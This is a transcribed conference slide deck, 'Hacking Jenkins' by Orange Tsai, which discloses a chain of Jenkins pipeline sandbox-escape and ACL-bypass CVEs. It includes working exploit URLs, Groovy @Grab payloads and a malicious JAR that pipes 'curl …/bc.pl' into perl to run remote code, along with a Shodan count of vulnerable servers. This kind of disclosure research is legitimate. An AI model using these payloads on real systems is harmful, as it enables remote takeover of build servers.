hacking jenkins
play

Hacking Jenkins! Orange Tsai Orange Tsai Come from Taiwan - PowerPoint PPT Presentation

Aug 31, 2022 •281 likes •1.32k views

Hacking Jenkins! Orange Tsai Orange Tsai Come from Taiwan Principal security researcher at DEVCORE Speaker at Black Hat US/ASIA , DEFCON , HITB , CODEBLUE CTF player (Captain of HITCON CTF team and member of 217 ) Bounty

  1. Let's try that in local this.class.classLoader.parseClass(''' @groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec("touch pwned") }) class Person {} ''');

  2. Let's try that in local $ ls poc.groovy $ groovy poc.groovy $ ls poc.groovy pwned

  3. While reproducing it on remote… It shows What the hell is that

  4. Root cause analysis • Pipeline Shared Groovy Libraries Plugin • A plugin for importing customized libraries into Pipeline • Jenkins loads your customized library before every Pipeline execute • The root cause is - during compile-time, there is no corresponded library in classPath

  5. How to fix Ask admin to uninstall the plugin

  6. How to fix Ask admin to uninstall the plugin

  7. @Grab @Grab(group='commons-lang', module='commons-lang', version='2.4') import org.apache.commons.lang.WordUtils println "Hello ${WordUtils.capitalize('world')}"

  8. @GrabResolve @GrabResolver(name='restlet', root='http://maven.restlet.org/') @Grab(group='org.restlet', module='org.restlet', version='1.1.6') import org.restlet

  9. @GrabResolve @GrabResolver(name='restlet', root='http://malicious.com/') @Grab(group='org.restlet', module='org.restlet', version='1.1.6') import org.restlet

  10. Oh, it works 220.133.114.83 - - [18/Dec/2018:18:56:54 +0800] "HEAD /org/restlet/org.restlet/1.1.6/org.restlet-1.1.6.jar HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0"

  11. Import arbitrary JAR But how to get code execution?

  12. Dig deeper into @Grab We start to review the Groovy implementation

  13. groovy.grape.GrapeIvy

  14. groovy.grape.GrapeIvy

  15. Yes We can poke the Constructor on any class!

  16. Chain all together

  17. Prepare the malicious JAR public class Orange { public Orange() { try { String payload = "curl malicious/bc.pl | perl -"; String[] cmds = {"/bin/bash", "-c", payload}; java.lang.Runtime.getRuntime().exec(cmds); } catch (Exception e) { } }}

  18. Prepare the malicious JAR $ javac Orange.java $ mkdir -p META-INF/services/ $ echo Orange >META-INF/services/org.codehaus.groovy.plugins.Runners $ find – type f ./Orange.java ./Orange.class ./META-INF/services/org.codehaus.groovy.plugins.Runners $ jar cvf poc-1.jar tw/ $ cp poc-1.jar ~/www/tw/orange/poc/1/ $ curl -I http://[host]/tw/orange/poc/1/poc-1.jar

  19. Attacking remote Jenkins! http://jenkins/descriptorByName/org.jenkinsci.plugins.w orkflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name='orange.tw', root='http://evil/')%0a @Grab(group='tw.orange', module='poc', version='1')%0a import Orange;

  20. Demo https://youtu.be/abuH-j-6-s0

  21. Survey on Shodan • It is about 75000 Jenkins servers in the wild • $ cat versions | sort | uniq -c | sort -n | less 11750- Jenkins: 2.150.1 • 1933 - Jenkins: 2.107.3 5473 - Jenkins: 2.138.3 • 1577 - Jenkins: 2.60.3 4583 - Jenkins: 2.121.3 • 1559 - Jenkins: 2.107.2 4534 - Jenkins: 2.138.2 • 1348 - Jenkins: 2.89.4 3389 - Jenkins: 2.156 • 1263 - Jenkins: 2.155 2987 - Jenkins: 2.138.1 • 1095 - Jenkins: 2.153 2530 - Jenkins: 2.121.1 • 1012 - Jenkins: 2.107.1 2422 - Jenkins: 2.121.2 • 958 - Jenkins: 2.89.3

  22. Survey on Shodan • We suppose all installed the suggested plugins • Enable Overall/Read are vulnerable • Disable Overall/Read • Version > 2.138 can be chained with the ACL bypass vulnerability • It's about 45000/75000 vulnerable Jenkins we can hack

  23. Evolution of the exploit @orange_8361 @0ang3el @webpentest Release the blog CVE-2018-1000861 Release the blog Hacking Jenkins part-2 ACL bypass fixed Hacking Jenkins part-1 and the RCE chain 2018-12-05 2019-01-16 2019-02-19 2019-01-08 2019-01-28 2019-03-06 CVE-2019-1003005 CVE-2019-1003029 CVE-2019-1003000 Another path to reach the Another sandbox escape Sandbox escape fixed syntax validation fixed in GroovyShell.parse fixed ( classLoader.parseClass ) ( GroovyShell.parse ) @orange_8361 @orange_8361 @orange_8361

  24. Evolution of the exploit • Original entry (based on classLoader.parseClass ) • Meta programming is still required to obtain code execution • New entry found by @0ang3el (based on GroovyShell.parse ) • A more universal entry • The new entry is based on a higher level Groovy API • With more features added compared to the original API, @webpentest found an easier way to escape the sandbox!

  25. More reliable exploit chain http://jenkins/securityRealm/user/admin/descriptorByName/ org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.Secur eGroovyScript/checkScript ?sandbox=true &value=public class poc { public poc() { "curl orange.tw/bc.pl | perl -".execute() } } CVE-2019-1003029 by @webpentest CVE-2019-1003005 by @0ang3el CVE-2018-1000861 by @orange_8361

  26. awesome-jenkins-rce-2019

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical? Legality VS Ethics State Sanctioned hacking BLACK HAT - Stereotypical Hacker -Stealing data for personal gain -Obviously not ethical -Using

1.17k views • 10 slides
Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking AI-Corp Hacking RL 1. Information gathering 2. Scanning 3. Exploitation & privilege escalation 4. Maintaining access & covering tracks

960 views • 62 slides
40 Jenkins features and plugins you wished you had known about before! Joep Weijers (TOPdesk)

40 Jenkins features and plugins you wished you had known about before! Joep Weijers (TOPdesk)

40 Jenkins features and plugins you wished you had known about before! Joep Weijers (TOPdesk) Which CI server do you use? https://snyk.io/blog/jvm-ecosystem-report-2018-tools https://wiki.jenkins.io/display/JENKINS/Logo

1.54k views • 132 slides
ZAP JENKINS PLUGIN Goran Sarenkapa ZAP Jenkins Plugin Project Lead WHAT IS ZAP? An easy to

ZAP JENKINS PLUGIN Goran Sarenkapa ZAP Jenkins Plugin Project Lead WHAT IS ZAP? An easy to

ZAP JENKINS PLUGIN Goran Sarenkapa ZAP Jenkins Plugin Project Lead WHAT IS ZAP? An easy to use webapp pentest tool Completely free and open source An OWASP flagship project Ideal for beginners But also used by professionals

386 views • 21 slides
Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1

Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1

Hacking SecondLife Michael Thumann Hacking SecondLife by Michael Thumann 2/24/08 1 Disclaimer Everything you are about to see, hear, read and experience is for educational purposes only. No warranties or guarantees implied or

692 views • 47 slides
Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June

Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June

Drone Hacking Basics Intro to UAS Architectures, Attack Vectors and RF Hacking Matt Koskela June 15, 2017 Outline Drone Architectures RF Basics Information Gathering RF Hacking Tools Exploits & Demos Q&A Why? Wrights Law

485 views • 27 slides
Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by

Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by

Hacking, Hacktivism, and Counterhacking April 22, 2015 Outline Vocabulary Hacking motivated by benign purposes Hacktivism Counterhacking Case Studies Site defacement Network exploration / Port scanning / SQL injection / . . .

522 views • 18 slides
Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in)

Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in)

ECF gratefully acknowledges financial support from the European Commission. Hacking Copenhagen ITS World Congress, Copenhagen 2018 Hacking Copenhagen Digitalising (life in) the city of Copenhagen using bicycles. Bicycle-as-a-Sensor 1.

278 views • 11 slides
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 10 Hacking Web Servers Objectives After reading this chapter and completing the exercises, you will be able to: Describe Web applications Explain Web application

530 views • 9 slides
Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat

Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat

Pulp Google Hacking The Next Generation Search Engine Hacking Arsenal 3 August 2011 Black Hat 2011 Las Vegas, NV Presen sented ed b by: Francis Brown Rob Ragan Stach & Liu, LLC www.stachliu.com Agenda O V E R V I E W

1.07k views • 72 slides
ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING

ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING

ZIGDIGGITY ZIGBEE HACKING TOOLKIT AUGUST 7-11, 2019 http://zigdiggity.c om NEW ZIGBEE HACKING TOOLKIT FREE, OPEN-SOURCE WHAT IS ZIGDIGGITY??? + = RaspBee radio + Raspberry Pi ZigDiggity - GitHub Code http://zigdiggity.com BISHOPFOX

617 views • 23 slides
Inequality and Poverty: the longitudinal perspective Stephen P. Jenkins London School of

Inequality and Poverty: the longitudinal perspective Stephen P. Jenkins London School of

1 Inequality and Poverty: the longitudinal perspective Stephen P. Jenkins London School of Economics and Political Science Email: s.jenkins@lse.ac.uk EIB, Luxembourg, 26 March 2014 2 Longitudinal perspectives rather than cross-sectional ones

670 views • 47 slides
Box-Jenkins Forecasting

Box-Jenkins Forecasting

Department of Logistics Management Box-Jenkins Forecasting Trend, seasonal factors, causal forecasting

355 views • 24 slides
Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020

Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020

Hacking C# CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 19.08.2020 HACKING C# - ADAM FURMANEK About me Experienced with backend, frontend, mobile, desktop, ML, databases. Blogger, public speaker. Author of .NET

481 views • 37 slides
Name of the Speaker : Karan kural Co-Speaker : Deepshikha Singh Company Name : Srijan

Name of the Speaker : Karan kural Co-Speaker : Deepshikha Singh Company Name : Srijan

Name of the Speaker : Karan kural Co-Speaker : Deepshikha Singh Company Name : Srijan Technologies Pvt. Ltd. Place: New Delhi. GitHub Pull Request Builder Plugin for Jenkins Tools We will going to use: What is Jenkins? Jenkins is an

219 views • 20 slides
Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi

Ethical Hacking Finse 2019 Cyber Security Winter school Universitetet i Oslo Laszlo Erddi From Myself Associate Professor at UiO Teaching Ethical Hacking since 2012 Lecturer of the IN5290 Ethical Hacking at UiO Leader

878 views • 66 slides
Network stack challenges at increasing speeds The 100Gbit/s challenge Jesper Dangaard Brouer

Network stack challenges at increasing speeds The 100Gbit/s challenge Jesper Dangaard Brouer

Network stack challenges at increasing speeds The 100Gbit/s challenge Jesper Dangaard Brouer Red Hat inc. LinuxCon North America, Aug 2015 1/39 Challenge: 100Gbit/s around the corner Overview Understand 100Gbit/s challenge and time

784 views • 45 slides
So we broke all CSPs You won't guess what happened next! whoami and Past Work Michele

So we broke all CSPs You won't guess what happened next! whoami and Past Work Michele

So we broke all CSPs You won't guess what happened next! whoami and Past Work Michele Spagnuolo Senior Information Security Engineer rosettaflash.com bitiodine.net Recap what happened last year Summary CSP is mostly used to

591 views • 47 slides
CIS 371 Computer Organization and Design Unit 9: Superscalar Pipelines Slides developed by Milo

CIS 371 Computer Organization and Design Unit 9: Superscalar Pipelines Slides developed by Milo

CIS 371 Computer Organization and Design Unit 9: Superscalar Pipelines Slides developed by Milo Martin & Amir Roth at the University of Pennsylvania with sources that included University of Wisconsin slides by Mark Hill, Guri Sohi, Jim

818 views • 26 slides
IX:$A$Protected$Dataplane$Opera3ng$ System$for$High$Throughput$and$ Low$Latency$ Adam%Belay

IX:$A$Protected$Dataplane$Opera3ng$ System$for$High$Throughput$and$ Low$Latency$ Adam%Belay

IX:$A$Protected$Dataplane$Opera3ng$ System$for$High$Throughput$and$ Low$Latency$ Adam%Belay ,$George$Prekas,$$ Samuel$Grossman,$Ana$Klimovic,$$ Christos$Kozyrakis,$Edouard$Bugnion$ HW$is$fast,$but$SW$is$a$BoLleneck$ $ $ 64Obyte$TCP$Echo:$

490 views • 24 slides
ECE 550D Fundamentals of Computer Systems and Engineering Fall 2016 Pipelines Tyler Bletsch

ECE 550D Fundamentals of Computer Systems and Engineering Fall 2016 Pipelines Tyler Bletsch

ECE 550D Fundamentals of Computer Systems and Engineering Fall 2016 Pipelines Tyler Bletsch Duke University Slides are derived from work by Andrew Hilton (Duke) and Amir Roth (Penn) Clock Period and CPI Single-cycle datapath Low CPI:

965 views • 60 slides
Injection Attacks and Memory Safety Nicholas Weaver based on David Wagners slides from Sp

Injection Attacks and Memory Safety Nicholas Weaver based on David Wagners slides from Sp

Computer Science 161 Fall 2016 Nicholas Weaver Injection Attacks and Memory Safety Nicholas Weaver based on David Wagners slides from Sp 2016 1 Administrivia Computer Science 161 Fall 2016 Nicholas Weaver You really really really

944 views • 50 slides
How Tracking Companies Circumvented Ad Blockers Using WebSockets Muhammad Ahmad Bashir, Sajjad

How Tracking Companies Circumvented Ad Blockers Using WebSockets Muhammad Ahmad Bashir, Sajjad

How Tracking Companies Circumvented Ad Blockers Using WebSockets Muhammad Ahmad Bashir, Sajjad Arshad, Engin Kirda, William Robertson, Christo Wilson Northeastern University Online Tracking 2 Online Tracking Surge in online

1.11k views • 80 slides
Host Ambiguities Host of Troubles: Multiple Ho in HTTP Implementations Jianjun Chen , Jian Jiang,

Host Ambiguities Host of Troubles: Multiple Ho in HTTP Implementations Jianjun Chen , Jian Jiang,

Host Ambiguities Host of Troubles: Multiple Ho in HTTP Implementations Jianjun Chen , Jian Jiang, Haixin Duan, Nicholas Weaver, Tao Wan, Vern Paxson 1 Multiparty interactions in current Internet Website Transparent Firewall Forward Browser

731 views • 33 slides

More recommend